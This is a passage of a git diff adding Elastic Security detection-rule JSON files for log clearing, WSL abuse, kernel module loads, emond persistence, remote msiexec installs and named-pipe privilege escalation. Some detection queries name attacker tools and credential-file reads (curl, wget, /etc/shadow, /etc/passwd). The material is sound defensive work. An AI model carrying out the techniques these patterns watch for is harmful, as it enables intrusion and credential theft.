or\n (\"Eventing.Reader.EventLogSession\" and \".ClearLog\") or\n (\"Diagnostics.EventLog\" and \".Clear\")\n ) and\n not file.path : (\n ?\\:\\\\\\\\*\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\Microsoft.PowerShell.Management\\\\\\\\*.psd1\n ) and\n not powershell.file.script_block_text : (\n \"CmdletsToExport=@(\\\"Add-Content\\\"\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear", + "https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "3d3aa8f9-12af-441f-9344-9f31053e316d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_3.json b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_3.json new file mode 100644 index 00000000000..2806dcf5f09 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a high count of destination IPs establishing an RDP connection with a single source IP. Once an attacker has gained access to one system, they might attempt to access more in the network in search of valuable assets, data, or further access points.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_rdp_distinct_count_destination_ip_for_source", + "name": "Spike in Number of Connections Made from a Source IP", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "3e0561b5-3fac-4461-84cc-19163b9aaa61", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "3e0561b5-3fac-4461-84cc-19163b9aaa61_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_6.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_6.json new file mode 100644 index 00000000000..30b299eaa04 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_6.json @@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects Linux Bash commands from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Windows Subsystem for Linux", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n (\n (\n (process.executable : \"?:\\\\Windows\\\\System32\\\\bash.exe\" or ?process.pe.original_file_name == \"Bash.exe\") and \n not process.command_line : (\"bash\", \"bash.exe\")\n ) or \n process.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Packages\\\\*\\\\rootfs\\\\usr\\\\bin\\\\bash\" or \n (\n process.parent.name : \"wsl.exe\" and ?process.parent.command_line : \"bash*\" and not process.name : \"wslhost.exe\"\n ) or \n (\n process.name : \"wsl.exe\" and process.args : (\n \"curl\", \"/etc/shadow\", \"/etc/passwd\", \"cat\", \"--system\", \"root\", \"-e\", \"--exec\", \"bash\", \"/mnt/c/*\"\n ) and not process.args : (\"wsl-bootstrap\", \"docker-desktop-data\", \"*.vscode-server*\")\n )\n ) and \n not process.parent.executable : (\"?:\\\\Program Files\\\\Docker\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\Docker\\\\*.exe\")\n", + "references": [ + "https://blog.f-secure.com/hunting-for-windows-subsystem-for-linux/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e0eeb75-16e8-4f2f-9826-62461ca128b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "3e0eeb75-16e8-4f2f-9826-62461ca128b7_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_3.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_3.json new file mode 100644 index 00000000000..1128d6d76ad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_3.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects the loading of a Linux kernel module through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\")\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96", + "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "3e12a439-d002-4944-bc42-171c0dcb9b96_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_4.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_4.json new file mode 100644 index 00000000000..cc1921cc53d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_4.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the loading of a Linux kernel module through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\")\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96", + "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "3e12a439-d002-4944-bc42-171c0dcb9b96_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_106.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_106.json new file mode 100644 index 00000000000..48586fba481 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_106.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a suspicious child process of the Event Monitor Daemon (emond). Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Emond Child Process", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.parent.name : \"emond\" and\n process.name : (\n \"bash\",\n \"dash\",\n \"sh\",\n \"tcsh\",\n \"csh\",\n \"zsh\",\n \"ksh\",\n \"fish\",\n \"Python\",\n \"python*\",\n \"perl*\",\n \"php*\",\n \"osascript\",\n \"pwsh\",\n \"curl\",\n \"wget\",\n \"cp\",\n \"mv\",\n \"touch\",\n \"echo\",\n \"base64\",\n \"launchctl\")\n", + "references": [ + "https://www.xorrior.com/emond-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3e3d15c6-1509-479a-b125-21718372157e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.014", + "name": "Emond", + "reference": "https://attack.mitre.org/techniques/T1546/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "3e3d15c6-1509-479a-b125-21718372157e_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_2.json b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_2.json new file mode 100644 index 00000000000..d4b66f712cb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_2.json @@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote File Execution via MSIEXEC", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n process.name : \"msiexec.exe\" and process.args : \"/V\"] by process.entity_id\n [network where host.os.type == \"windows\" and process.name : \"msiexec.exe\" and\n event.action == \"connection_attempted\"] by process.entity_id\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n process.parent.name : \"msiexec.exe\" and user.id : (\"S-1-5-21-*\", \"S-1-5-12-1-*\") and\n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\srtasks.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\srtasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskkill.exe\",\n \"?:\\\\Windows\\\\Installer\\\\MSI*.tmp\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\ie4uinit.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\ie4uinit.exe\",\n \"?:\\\\Windows\\\\System32\\\\sc.exe\",\n \"?:\\\\Windows\\\\system32\\\\Wbem\\\\mofcomp.exe\",\n \"?:\\\\Windows\\\\twain_32\\\\fjscan32\\\\SOP\\\\crtdmprc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\taskkill.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\schtasks.exe\",\n \"?:\\\\Windows\\\\system32\\\\schtasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\sdbinst.exe\") and\n not (process.code_signature.subject_name == \"Citrix Systems, Inc.\" and process.code_signature.trusted == true) and\n not (process.name : (\"regsvr32.exe\", \"powershell.exe\", \"rundll32.exe\", \"wscript.exe\") and\n process.Ext.token.integrity_level_name == \"high\" and\n process.args : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\")) and\n not (process.executable : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and process.code_signature.trusted == true) and\n not (process.name : \"rundll32.exe\" and process.args : \"printui.dll,PrintUIEntry\")\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e441bdb-596c-44fd-8628-2cfdf4516ada", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.007", + "name": "Msiexec", + "reference": "https://attack.mitre.org/techniques/T1218/007/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "3e441bdb-596c-44fd-8628-2cfdf4516ada_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_109.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_109.json new file mode 100644 index 00000000000..8e24ee5f3cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_109.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via named pipe impersonation. An adversary may abuse this technique by utilizing a framework such Metasploit's meterpreter getsystem command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Named Pipe Impersonation", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 